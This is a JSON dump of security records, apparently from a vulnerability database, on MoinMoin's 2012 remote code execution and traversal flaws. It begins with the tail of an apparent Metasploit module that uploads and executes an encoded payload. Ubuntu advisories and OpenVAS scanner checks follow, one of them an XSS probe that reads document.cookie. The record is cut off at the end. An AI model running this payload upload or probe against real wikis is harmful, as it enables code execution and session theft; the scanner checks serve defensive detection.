fail_with(Exploit::Failure::NoAccess, \"Error getting a session ID, check credentials or WritablePage option\")\r\n end\r\n\r\n # Check writable permissions\r\n if not writable_page?(session)\r\n fail_with(Exploit::Failure::NoAccess, \"There are no write permissions on #{@page}\")\r\n end\r\n\r\n # Upload payload\r\n print_status(\"Trying to upload payload...\")\r\n python_cmd = \"import os\\nos.system(\\\"#{Rex::Text.encode_base64(payload.encoded)}\\\".decode(\\\"base64\\\"))\"\r\n res = upload_code(session, \"exec('#{Rex::Text.encode_base64(python_cmd)}'.decode('base64'))\")\r\n if not res\r\n fail_with(Exploit::Failure::Unknown, \"Error uploading the payload\")\r\n end\r\n\r\n # Execute payload\r\n print_status(\"Executing the payload...\")\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(@base, @page),\r\n 'cookie' => session,\r\n 'vars_get' => {\r\n 'action' => 'AttachFile'\r\n }\r\n }, 5)\r\n\r\n end\r\n\r\nend\r\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26422/"}], "ubuntu": [{"lastseen": "2020-07-18T01:35:14", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6495", "CVE-2012-6080", "CVE-2012-6081"], "description": "It was discovered that MoinMoin did not properly sanitize its input when \nprocessing AnyWikiDraw and TWikiDraw actions. A remote attacker with write \naccess could exploit this to overwrite arbitrary files and execute \narbitrary code with the priviliges of the web server (user 'www-data').\n\nIt was discovered that MoinMoin also did not properly sanitize its input \nwhen processing the AttachFile action. A remote attacker could exploit \nthis to overwrite files via directory traversal.", "edition": 16, "modified": "2012-12-30T00:00:00", "published": "2012-12-30T00:00:00", "id": "USN-1680-1", "href": "https://ubuntu.com/security/notices/USN-1680-1", "title": "MoinMoin vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "openvas": [{"lastseen": "2017-07-24T12:51:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6495", "CVE-2012-6080", "CVE-2012-6081"], "description": "It was discovered that missing input validation in the twikidraw and\nanywikidraw actions can result in the execution of arbitrary code.\nThis security issue is being actively exploited.\n\nThis update also addresses path traversal in AttachFile.", "modified": "2017-07-07T00:00:00", "published": "2013-09-18T00:00:00", "id": "OPENVAS:892593", "href": "http://plugins.openvas.org/nasl.php?oid=892593", "type": "openvas", "title": "Debian Security Advisory DSA 2593-1 (moin - several vulnerabilities)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2593_1.nasl 6611 2017-07-07 12:07:20Z cfischer $\n# Auto-generated from advisory DSA 2593-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"moin on Debian Linux\";\ntag_insight = \"A WikiWikiWeb is a collaborative hypertext environment, with an\nemphasis on easy access to and modification of information. MoinMoin\nis a Python WikiClone that allows you to easily set up your own wiki,\nonly requiring a Web server and a Python installation.\";\ntag_solution = \"For the stable distribution (squeeze), this problem has been fixed in\nversion 1.9.3-1+squeeze4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.9.5-4.\n\nWe recommend that you upgrade your moin packages.\";\ntag_summary = \"It was discovered that missing input validation in the twikidraw and\nanywikidraw actions can result in the execution of arbitrary code.\nThis security issue is being actively exploited.\n\nThis update also addresses path traversal in AttachFile.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(892593);\n script_version(\"$Revision: 6611 $\");\n script_cve_id(\"CVE-2012-6082\", \"CVE-2012-6495\", \"CVE-2012-6080\", \"CVE-2012-6081\");\n script_name(\"Debian Security Advisory DSA 2593-1 (moin - several vulnerabilities)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-07 14:07:20 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 11:53:02 +0200 (Wed, 18 Sep 2013)\");\n script_tag(name: \"cvss_base\", value:\"6.4\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2012/dsa-2593.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"python-moinmoin\", ver:\"1.9.3-1+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-23T13:09:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6495", "CVE-2012-6080", "CVE-2012-6081"], "description": "Check for the Version of moin", "modified": "2018-01-23T00:00:00", "published": "2013-01-21T00:00:00", "id": "OPENVAS:865116", "href": "http://plugins.openvas.org/nasl.php?oid=865116", "type": "openvas", "title": "Fedora Update for moin FEDORA-2013-0600", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for moin FEDORA-2013-0600\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"moin on Fedora 18\";\ntag_insight = \"MoinMoin is an advanced, easy to use and extensible WikiEngine with a large\n community of users. Said in a few words, it is about collaboration on easily\n editable web pages.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097105.html\");\n script_id(865116);\n script_version(\"$Revision: 8494 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 07:57:55 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:29:46 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-6495\", \"CVE-2012-6081\", \"CVE-2012-6082\", \"CVE-2012-6080\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2013-0600\");\n script_name(\"Fedora Update for moin FEDORA-2013-0600\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of moin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"moin\", rpm:\"moin~1.9.6~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6495", "CVE-2012-6080", "CVE-2012-6081"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-01-21T00:00:00", "id": "OPENVAS:1361412562310865116", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865116", "type": "openvas", "title": "Fedora Update for moin FEDORA-2013-0600", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for moin FEDORA-2013-0600\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097105.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865116\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:29:46 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-6495\", \"CVE-2012-6081\", \"CVE-2012-6082\", \"CVE-2012-6080\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2013-0600\");\n script_name(\"Fedora Update for moin FEDORA-2013-0600\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'moin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n script_tag(name:\"affected\", value:\"moin on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"moin\", rpm:\"moin~1.9.6~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6495", "CVE-2012-6080", "CVE-2012-6081"], "description": "Gentoo Linux Local Security Checks GLSA 201309-14", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121028", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121028", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201309-14", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201309-14.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121028\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:25:52 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201309-14\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in MoinMoin. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201309-14\");\n script_cve_id(\"CVE-2012-6080\", \"CVE-2012-6081\", \"CVE-2012-6082\", \"CVE-2012-6495\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201309-14\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-apps/moinmoin\", unaffected: make_list(\"ge 1.9.6\"), vulnerable: make_list(\"lt 1.9.6\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-06-11T17:45:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6495", "CVE-2012-6080", "CVE-2012-6081"], "description": "This host is installed with MoinMoin and is prone to multiple\n vulnerabilities.", "modified": "2020-06-09T00:00:00", "published": "2013-03-21T00:00:00", "id": "OPENVAS:1361412562310803445", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803445", "type": "openvas", "title": "MoinMoin Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# MoinMoin Multiple Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:moinmo:moinmoin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803445\");\n script_version(\"2020-06-09T14:44:58+0000\");\n script_cve_id(\"CVE-2012-6080\", \"CVE-2012-6081\", \"CVE-2012-6082\", \"CVE-2012-6495\");\n script_bugtraq_id(57076, 57082, 57089, 57147);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 14:44:58 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-03-21 15:03:34 +0530 (Thu, 21 Mar 2013)\");\n script_name(\"MoinMoin Multiple Vulnerabilities\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moinmoin_wiki_detect.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"moinmoinWiki/installed\");\n\n script_xref(name:\"URL\", value:\"http://moinmo.in/SecurityFixes\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/51663\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2012/12/29/6\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2012/12/30/6\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute arbitrary\n HTML or web script in a user's browser session in the context of an affected\n site, upload malicious script and overwrite arbitrary files via directory\n traversal sequences.\");\n\n script_tag(name:\"affected\", value:\"MoinMoin version 1.9.x prior to 1.9.6.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws due to,\n\n - Certain input when handling the AttachFile action is not properly verified\n before being used to write files.\n\n - The application allows the upload of files with arbitrary extensions to a\n folder inside the webroot when handling the twikidraw or anywikidraw\n actions.\n\n - Input passed via page name in rss link is not properly sanitised before\n being displayed to the user.\");\n\n script_tag(name:\"solution\", value:\"Update to MoinMoin 1.9.6 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with MoinMoin and is prone to multiple\n vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( port:port, cpe:CPE ) ) exit( 0 );\n\nif( dir == \"/\" ) dir = \"\";\nurl = dir + 'MoinMoin/theme/__init__.py/\"<script>alert(document.cookie)</script>';\n\nif( http_vuln_check( port:port, url:url, pattern:\"<script>alert\\(document\\.cookie\\)</script>\", check_header:TRUE ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6495", "CVE-2012-6080", "CVE-2012-6081"], "description": "It was discovered that missing input validation in the twikidraw and\nanywikidraw actions can result in the execution of arbitrary code.\nThis security issue is being actively exploited.\n\nThis update also addresses path traversal in AttachFile.", "modified": "2019-03-18T00:00:00", "published": "2013-09-18T00:00:00", "id": "OPENVAS:1361412562310892593", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892593", "type": "openvas", "title": "Debian Security Advisory DSA 2593-1 (moin - several vulnerabilities)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2593_1.nasl 14276 2019-03-18 14:43:56Z cfischer $\n# Auto-generated from advisory DSA 2593-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892593\");\n script_version(\"$Revision: 14276 $\");\n script_cve_id(\"CVE-2012-6082\", \"CVE-2012-6495\", \"CVE-2012-6080\", \"CVE-2012-6081\");\n script_name(\"Debian Security Advisory DSA 2593-1 (moin - several vulnerabilities)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:43:56 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 11:53:02 +0200 (Wed, 18 Sep 2013)\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2012/dsa-2593.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB6\");\n script_tag(name:\"affected\", value:\"moin on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (squeeze), this problem has been fixed in\nversion 1.9.3-1+squeeze4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.9.5-4.\n\nWe recommend that you upgrade your moin packages.\");\n script_tag(name:\"summary\", value:\"It was discovered that missing input validation in the twikidraw and\nanywikidraw actions can result in the execution of arbitrary code.\nThis security issue is being actively exploited.\n\nThis update also addresses path traversal in AttachFile.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"python-moinmoin\", ver:\"1.9.3-1+squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2017-07-25T10:52:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6495", "CVE-2012-4404", "CVE-2012-6080", "CVE-2012-6081"], "description": "Check for the Version of moin", "modified": "2017-07-10T00:00:00", "published": "2013-01-24T00:00:00", "id": "OPENVAS:865221", "href": "http://plugins.openvas.org/nasl.php?oid=865221", "type": "openvas", "title": "Fedora Update for moin FEDORA-2013-0640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for moin FEDORA-2013-0640\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"moin on Fedora 16\";\ntag_insight = \"MoinMoin is an advanced, easy to use and extensible WikiEngine with a large\n community of users. Said in a few words, it is about collaboration on easily\n editable web pages.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097263.html\");\n script_id(865221);\n script_version(\"$Revision: 6628 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:32:47 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-24 09:23:38 +0530 (Thu, 24 Jan 2013)\");\n script_cve_id(\"CVE-2012-6495\", \"CVE-2012-4404\", \"CVE-2012-6081\",\n \"CVE-2012-6082\", \"CVE-2012-6080\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2013-0640\");\n script_name(\"Fedora Update for moin FEDORA-2013-0640\");\n\n script_summary(\"Check for the Version of moin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"moin\", rpm:\"moin~1.9.6~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-06T13:09:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6495", "CVE-2012-4404", "CVE-2012-6080", "CVE-2012-6081"], "description": "Check for the Version of moin", "modified": "2018-02-05T00:00:00", "published": "2013-01-24T00:00:00", "id": "OPENVAS:865229", "href": "http://plugins.openvas.org/nasl.php?oid=865229", "type": "openvas", "title": "Fedora Update for moin FEDORA-2013-0685", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for moin FEDORA-2013-0685\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"moin on Fedora 17\";\ntag_insight = \"MoinMoin is an advanced, easy to use and extensible WikiEngine with a large\n community of users. Said in a few words, it is about collaboration on easily\n editable web pages.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097329.html\");\n script_id(865229);\n script_version(\"$Revision: 8672 $\");\n script_tag(name:\"last_modification\", 